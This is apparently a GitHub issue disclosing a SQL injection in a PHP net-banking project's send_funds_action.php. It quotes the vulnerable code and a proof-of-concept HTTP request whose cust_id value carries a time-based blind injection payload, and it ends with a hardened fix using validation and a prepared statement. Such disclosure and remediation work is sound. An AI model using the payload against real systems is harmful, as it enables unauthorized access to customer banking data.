Found a vulnerability #19
Comments
Please can I have your Facebook contact or WhatsApp or Skype?
…On Mon, Sep 5, 2022, 10:18 0clickjacking0 ***@***.***> wrote:
Vulnerability file address
net-banking/send_funds_action.php, from line 17. The $_GET['cust_id']
parameter is controllable: the parameter cust_id can be passed through GET,
and $receiver_id is not protected from SQL injection. On line 29,
$result5 = $conn->query($sql5); makes a SQL query, resulting in SQL injection.
..................
if (isset($_GET['cust_id'])) {
    // cust_id is taken from the query string with no validation or escaping
    $receiver_id = $_GET['cust_id'];
}
$sender_id = $_SESSION['loggedIn_cust_id'];
$amt = mysqli_real_escape_string($conn, $_POST["amt"]);
$password = mysqli_real_escape_string($conn, $_POST["password"]);
$sql0 = "SELECT * FROM customer WHERE cust_id=".$sender_id." AND pwd='".$password."'";
$result0 = $conn->query($sql0);
$row0 = $result0->fetch_assoc();
// $receiver_id is concatenated into the statement unquoted
$sql5 = "SELECT * FROM customer WHERE cust_id=".$receiver_id;
$result5 = $conn->query($sql5);
..................
POC
GET /net-banking/send_funds_action.php?cust_id=666 AND (SELECT 2011 FROM (SELECT(SLEEP(5)))DwUi) HTTP/1.1
Host: www.bank.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3
Upgrade-Insecure-Requests: 1
Attack results pictures
[image: image-20220904201949905]
<https://camo.githubusercontent.com/e87e2b01b26d7f5a6f9aad101ade934b4c59f2219d0f57eeade12f5237070cea/68747470733a2f2f7869616e7975313233696d616765732e6f73732d636e2d68616e677a686f752e616c6979756e63732e636f6d2f32303232303930343230313934392e706e67>
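A hardened form of the receiver lookup described in the report, as an added example that is not part of the original issue or the project's code: it validates cust_id as an integer and binds it in a prepared statement instead of concatenating it. The helper names parse_cust_id and find_receiver and the 400 response are assumptions.

```php
<?php
// Added example, not the project's code. Hardened form of the receiver
// lookup from send_funds_action.php: validate cust_id, then bind it.

/** Return cust_id as a positive int, or null if it is not a plain integer. */
function parse_cust_id($raw): ?int
{
    // $_GET values can be arrays (cust_id[]=...), so reject non-strings first.
    if (!is_string($raw)) {
        return null;
    }
    // FILTER_VALIDATE_INT accepts only a decimal integer, so any value that
    // carries SQL text fails here before it gets near a query.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Look up the receiver with a bound parameter instead of concatenation. */
function find_receiver(mysqli $conn, int $receiver_id): ?array
{
    // The statement text is fixed; the value travels separately as an int ("i").
    $stmt = $conn->prepare('SELECT * FROM customer WHERE cust_id = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $conn->error);
    }
    $stmt->bind_param('i', $receiver_id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;   // null when no such customer exists
}

// How the handler would use it ($conn is the application's existing mysqli
// connection; answering 400 is an assumption about the desired behaviour):
//   $receiver_id = parse_cust_id($_GET['cust_id'] ?? null);
//   if ($receiver_id === null) { http_response_code(400); exit; }
//   $receiver = find_receiver($conn, $receiver_id);

// Constructed inputs, including the cust_id value from the report's request.
$samples = ['666', '666 AND (SELECT 2011 FROM (SELECT(SLEEP(5)))DwUi)', '', '-3'];
foreach ($samples as $raw) {
    printf("%-55s => %s\n", var_export($raw, true), var_export(parse_cust_id($raw), true));
}
```

Only the first sample passes validation; the value from the report's request is rejected before any query is built, and the bound parameter keeps it out of the statement text even if validation were skipped.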